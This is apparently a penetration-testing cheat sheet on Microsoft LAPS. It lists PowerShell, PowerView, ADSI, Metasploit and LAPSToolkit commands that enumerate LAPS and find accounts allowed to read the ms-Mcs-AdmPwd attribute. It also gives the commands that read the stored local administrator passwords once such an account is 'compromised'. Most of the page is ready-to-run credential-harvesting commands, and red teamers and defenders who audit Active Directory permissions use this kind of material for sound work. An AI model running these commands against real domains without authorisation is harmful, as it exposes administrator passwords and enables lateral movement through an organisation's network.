Links

LAPS

Description

The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

Enumeration

Check if LAPS is installed

# Identify if installed by Program Files on Domain Controller
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
# Identify if installed by checking the AD Object
Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=DC01,DC=Security,CN=Local'

Find ms-mcs-admpwd attribute

# Powerview
Get-NetComputer | Select-Object 'name','ms-mcs-admpwd'
Get-DomainComputer -identity <Hostname> -properties ms-Mcs-AdmPwd
# PowerShell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
# Native
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}

LAPS Module commands

# Import module
Import-Module AdmPwd.PS
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <Hostname>
The following can be used to identify what objects have the ability to read the LAPS password property for a specified computer inside the domain
Powerview
# Get which objects can read LAPS password for specified computer object
Get-NetComputer -Identity '<Hostname>' |
Select-Object -ExpandProperty distinguishedname |
ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {
Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
} | Where-Object {
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
} | ForEach-Object {
Convert-NameToSid $_.IdentityReference
} | Select-Object -ExpandProperty SID | Get-ADObject
Get ACL's where objects are allowed to read the LAPS password property.
Powerview
Get-NetOU |
Get-ObjectAcl -ResolveGUIDs |
Where-Object {
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
} | ForEach-Object {
$_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
$_
}

Metasploit

use post/windows/gather/credentials/enum_laps

LAPSToolkit

LAPSToolkit.ps1
# Gets all computers which have LAPS enabled
Get-LAPSComputers
# Get Groups that can read the ms-Mcs-AdmPwd attribute
Find-LAPSDelegatedGroups
# Checks for ExtendedRights for Laps on each AD Computer
Find-AdmPwdExtendedRights

Resources